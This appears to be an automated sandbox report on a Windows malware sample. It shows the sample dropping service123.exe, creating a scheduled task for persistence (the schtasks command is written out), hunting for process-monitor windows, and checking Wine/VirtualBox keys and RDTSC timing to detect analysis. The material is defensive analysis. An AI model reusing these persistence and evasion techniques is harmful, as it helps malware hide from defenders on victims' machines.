Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B54ACB second address: B54AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC3313C0920h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jno 00007FC3313C0916h 0x00000017 js 00007FC3313C0916h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5CA7 second address: CC5CDD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC330B7B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC330B7B0FFh 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FC330B7B108h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5E73 second address: CD5E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC3313C0916h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007FC3313C0916h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5E89 second address: CD5E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5E8F second address: CD5EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC3313C091Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5EA8 second address: CD5EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5EAE second address: CD5ED6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC3313C0916h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jp 00007FC3313C0916h 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 push esi 0x0000001a jmp 00007FC3313C091Bh 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5ED6 second address: CD5EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5EDC second address: CD5EE6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC3313C0916h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6039 second address: CD6041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6041 second address: CD6059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC3313C0918h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FC3313C0916h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6059 second address: CD6061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6061 second address: CD607A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0923h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD61A6 second address: CD61B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC330B7B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6343 second address: CD6353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC3313C0916h 0x0000000a js 00007FC3313C0916h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6353 second address: CD6390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC330B7B110h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FC330B7B10Ah 0x00000014 pushad 0x00000015 jg 00007FC330B7B0F6h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD650B second address: CD6538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0924h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FC3313C091Dh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA31E second address: CDA324 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA3DF second address: CDA446 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC3313C092Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC3313C0922h 0x00000010 nop 0x00000011 movzx esi, di 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FC3313C0918h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 add dword ptr [ebp+122D1953h], eax 0x00000036 call 00007FC3313C0919h 0x0000003b push ebx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA446 second address: CDA479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B106h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC330B7B0FFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA479 second address: CDA47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA47D second address: CDA492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jnp 00007FC330B7B0F6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA492 second address: CDA498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA498 second address: CDA52B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC330B7B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 jmp 00007FC330B7B101h 0x00000026 popad 0x00000027 pop eax 0x00000028 movzx esi, si 0x0000002b push 00000003h 0x0000002d cmc 0x0000002e push 00000000h 0x00000030 mov dh, 68h 0x00000032 push 00000003h 0x00000034 mov dl, cl 0x00000036 add dword ptr [ebp+122D2E81h], edx 0x0000003c call 00007FC330B7B0F9h 0x00000041 jmp 00007FC330B7B0FBh 0x00000046 push eax 0x00000047 pushad 0x00000048 push ecx 0x00000049 pushad 0x0000004a popad 0x0000004b pop ecx 0x0000004c jmp 00007FC330B7B101h 0x00000051 popad 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC330B7B109h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA52B second address: CDA5B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0923h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007FC3313C091Eh 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FC3313C091Fh 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FC3313C0918h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D19BAh], edx 0x00000040 or si, D671h 0x00000045 lea ebx, dword ptr [ebp+1245917Ch] 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FC3313C0925h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA5B4 second address: CDA5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC330B7B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA60E second address: CDA679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC3313C0916h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FC3313C0918h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b or dword ptr [ebp+122D1AA5h], ebx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FC3313C0918h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov esi, dword ptr [ebp+122D3933h] 0x00000053 mov edx, dword ptr [ebp+122D1953h] 0x00000059 push 2BEADC03h 0x0000005e pushad 0x0000005f push edi 0x00000060 push edx 0x00000061 pop edx 0x00000062 pop edi 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA679 second address: CDA731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor dword ptr [esp], 2BEADC83h 0x0000000d push 00000003h 0x0000000f pushad 0x00000010 jmp 00007FC330B7B0FDh 0x00000015 or dword ptr [ebp+122D3006h], esi 0x0000001b popad 0x0000001c push 00000000h 0x0000001e mov edx, edi 0x00000020 push 00000003h 0x00000022 push 9F8BDD08h 0x00000027 jng 00007FC330B7B102h 0x0000002d jnc 00007FC330B7B0FCh 0x00000033 add dword ptr [esp], 207422F8h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FC330B7B0F8h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 jmp 00007FC330B7B0FFh 0x00000059 ja 00007FC330B7B10Dh 0x0000005f lea ebx, dword ptr [ebp+12459187h] 0x00000065 movzx edx, di 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FC330B7B108h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7B38 second address: CF7B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7B3D second address: CF7B4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7CC5 second address: CF7CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7CC9 second address: CF7CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC330B7B0FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7CDF second address: CF7CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3313C091Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7FA8 second address: CF7FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B107h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC330B7B105h 0x00000010 popad 0x00000011 ja 00007FC330B7B109h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8182 second address: CF81CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3313C0923h 0x00000008 jmp 00007FC3313C0926h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC3313C0924h 0x00000015 jg 00007FC3313C0916h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8454 second address: CF8459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8459 second address: CF845F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF845F second address: CF8499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B108h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FC330B7B108h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8499 second address: CF84B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3313C091Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF84B2 second address: CF84BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF84BE second address: CF84DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC3313C091Dh 0x00000008 jc 00007FC3313C0916h 0x0000000e pop ebx 0x0000000f je 00007FC3313C0931h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8918 second address: CF893A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a jmp 00007FC330B7B104h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8A9F second address: CF8B06 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3313C0916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC3313C0928h 0x0000000f pushad 0x00000010 jmp 00007FC3313C091Fh 0x00000015 jmp 00007FC3313C0926h 0x0000001a jmp 00007FC3313C0924h 0x0000001f popad 0x00000020 jbe 00007FC3313C091Eh 0x00000026 push eax 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF9446 second address: CF944A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF944A second address: CF945C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF945C second address: CF9468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC330B7B0F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF9629 second address: CF9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC3313C0916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF907 second address: CFF92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FC330B7B109h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D055A0 second address: D055AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FC3313C0916h 0x00000009 pop esi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D055AD second address: D055CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC330B7B105h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D055CB second address: D055D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FC3313C0916h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D04A39 second address: D04A59 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC330B7B0F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d ja 00007FC330B7B0F6h 0x00000013 je 00007FC330B7B0F6h 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D04D1E second address: D04D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
